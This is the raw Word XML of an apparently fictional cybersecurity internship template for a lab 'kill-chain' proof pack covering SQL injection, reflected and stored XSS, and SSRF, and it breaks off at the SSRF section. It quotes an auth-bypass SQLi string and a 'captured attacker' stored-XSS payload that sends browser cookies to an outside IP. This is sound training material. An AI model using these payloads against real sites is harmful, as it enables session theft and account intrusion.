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Ubuntu Bridge Initiative · Cybersecurity Internship · Cohort 1 · Stage 2 Capstone</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Editable template — Deliverable 2 of 4. Target length: 3–5 pages. This is the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">“I actually did it”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">deliverable. The template gives you the section shape of a top-band proof pack;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payloads and the verbatim server responses must be your own</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">, copied from the lab. The verifier checks the SQLi and SSRF payloads on the server — a described exploit scores nothing, a working one scores. Replace every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[BRACKETED]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">prompt. Remove every prompt and every italic guidance line before submission.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="10" w:name="X224a01039caac5bda401a3b53d84c98b8afab67"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Deliverable 2 — Exploitation proof pack: the full kill-chain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Before you start writing, check yourself:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Do you have, saved in your scratch file: the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">exact payload</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">you sent and the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">verbatim server/lab response</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(flag or verifier success output) for</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">all four</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">links?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001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SQLi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SSRF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, do you also have your</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">first failed attempt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and its response? (The brief asks for it by name. A clean one-shot success with no failed attempt reads as copied, not earned.)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Can you state the chain order from memory:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SQL injection → reflected XSS → stored XSS → SSRF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">? Sections out of order cost points.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Can you tell the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">reflected</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">XSS (search field) apart from the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">stored</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">XSS (notes/comments)? Confusing them is the single most common Stage 2 mistake.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If any answer is no, go back to the lab. This template cannot fake a server-verified flag.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="9" w:name="page-1-title-and-kill-chain-overview"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">── Page 1 — Title and kill-chain overview ──</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Stage 2 · D2 · [Your Full Name] · [UBI-2026-####]</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="9"/>
    <w:bookmarkEnd w:id="10"/>
    <w:bookmarkStart w:id="20" w:name="stage-2-capstone-deliverable-2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Stage 2 Capstone · Deliverable 2</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="13" w:name="Xaf4292bb5f5646885d24448d44a68ea4f1ecaf7"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Exploitation proof pack — the full kill-chain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[Your full name] ·</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Intern code:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[UBI-2026-####]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[DD Month 2026]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Sankofa Digital · reproduction of</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“The Griot”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">web kill-chain · lab environment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="11" w:name="kill-chain-summary"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kill-chain summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[One short paragraph (~80 words). State the four links in order and what each one</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">handed to the next</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. The grader wants to see you understand the chain as a chain — each link is a pivot, not a standalone bug.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Example shape:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">“Four links, exploited in order. The SQL injection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login.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">gave an authenticated admin session without a password. The reflected XSS proved client-trust was broken; the stored XSS in the notes/comments feature weaponised it into a persistent cookie-theft beacon. The SSRF against the metadata service then converted web access into cloud IAM credentials — the pivot from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">‘inside the app’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‘inside the account’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">.”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="11"/>
    <w:bookmarkStart w:id="12" w:name="chain-of-custody-note"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chain-of-custody note</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[2 sentences. Confirm every payload below was run in the lab environment, and that the responses pasted are verbatim (you have not paraphrased a server response). Graders treat paraphrased server output as a red flag.]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Before you move to page 2, confirm:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">First line is the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Stage 2 · D2 · Name · Code</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">identity line.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The four links are named in the correct order in the summary.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You have stated that responses are verbatim, not paraphrased.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77c2ca6f8ba2416db9586c3a85210d383cead4d"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">── Pages 2–4 — One section per vulnerability, in exploit order ──</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Use the block below once per link. Keep the order: SQLi → reflected XSS → stored XSS → SSRF. Do not merge the two XSS into one section — they are different vulnerability classes with different blast radius, and keeping them separate is graded.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="14" w:name="Xd93f5a287dccb2c609c58afc1ee4114f40cfdd2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Link 1 — SQL injection (authentication bypass)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Component.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[endpoint / field — e.g. POST /legacy-admin/login.php, the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">username</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">parameter]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">CWE.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[CWE-89 — SQL Injection. State it.]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The payload I sent (verbatim):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[Paste your exact payload. The captured-attacker example is username=admin' OR '1'='1 with any password — but for full marks the lab also rewards a UNION SELECT that pulls a column the verifier checks. Paste what YOU ran and what the server accepted.]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The verbatim server / lab response confirming it worked:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[Paste the exact response — the 302 to dashboard.php and the issued session, the verifier's success output, or your flag. Do not paraphrase.]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">First failed attempt (required for SQLi):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[Paste your first attempt that did NOT work — e.g. a UNION SELECT with the wrong number of columns.]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Why it failed:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[One sentence — e.g. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">wrong-column-count</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: my UNION had three columns against a four-column SELECT, so the engine rejected it before evaluating the injection.”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Root cause (one line, cause not symptom):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[e.g. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“The data-access layer concatenated</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$username</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">straight into the SQL string (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">...WHERE username = '" . $username . "'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — see recovered</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">01-legacy-admin-login.php</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. The cause is string concatenation in the query builder, not</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘input wasn’t validated’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.”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What this link gave the attacker (the pivot):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[One sentence — e.g. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“An authenticated admin session, which unlocked</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">users.php</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(312 rows of PII) and the comment/notes feature used in Link 3.”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4"/>
    <w:bookmarkStart w:id="15" w:name="link-2-reflected-xss-search-field"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Link 2 — Reflected XSS (search field)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Component.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[the reflected sink — name the search/query field and the parameter]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">CWE.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[CWE-79 — Cross-site Scripting. Specify reflected.]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The payload I sent (verbatim):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[Your reflected payload — the one echoed straight back in the response from a request parameter, not stored.]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The verbatim response confirming reflection:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[Paste the response showing your script echoed unescaped in the page. Your flag if the lab issues one.]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Why this is REFLECTED, not stored:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[One sentence drawing the distinction explicitly — the payload lives in the request and is echoed in that same response; it is not persisted, so the blast radius is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“anyone who clicks my crafted link,”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">not</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“anyone who views the page.”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What this link gave the attacker (the pivot):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[One sentence — proof the app trusts client input in HTML context, which Link 3 escalates into persistence.]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="15"/>
    <w:bookmarkStart w:id="16" w:name="link-3-stored-xss-notes-comments"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Link 3 — Stored XSS (notes / comments)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Component.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[POST /legacy-admin/comments/post — the persisted notes/comments field]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">CWE.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[CWE-79 — Cross-site Scripting. Specify stored.]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The payload I sent (verbatim):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[Your stored payload. The captured attacker used:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;fetch('https://185.220.101.9:8443/c?'+document.cookie)&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Paste what YOU stored and confirmed renders for a different viewer.]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The verbatim response / proof it persisted and fired:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[Paste the stored-and-rendered proof or your flag — evidence the payload executes when a DIFFERENT user loads the page.]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Why this is STORED, not reflected — and why its blast radius is larger:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[One or two sentences. The payload is persisted server-side and fires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viewer of the notes page (including the admin), with no crafted link required. State the cookie-theft beacon to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">185.220.101.9:8443</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">as the concrete impact.]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">What this link gave the attacker (the pivot):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[One sentence — session/cookie capture, broadening access beyond the SQLi session.]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="16"/>
    <w:bookmarkStart w:id="17" w:name="X93e33deb4c103298b81c92829d018f445ab4bfd"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Link 4 — SSRF (metadata service → cloud IAM credentials)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Component.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[the SSRF sink — the URL-fetching feature; note the open redirect / ?next= and the files/path fetch as related primitives]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
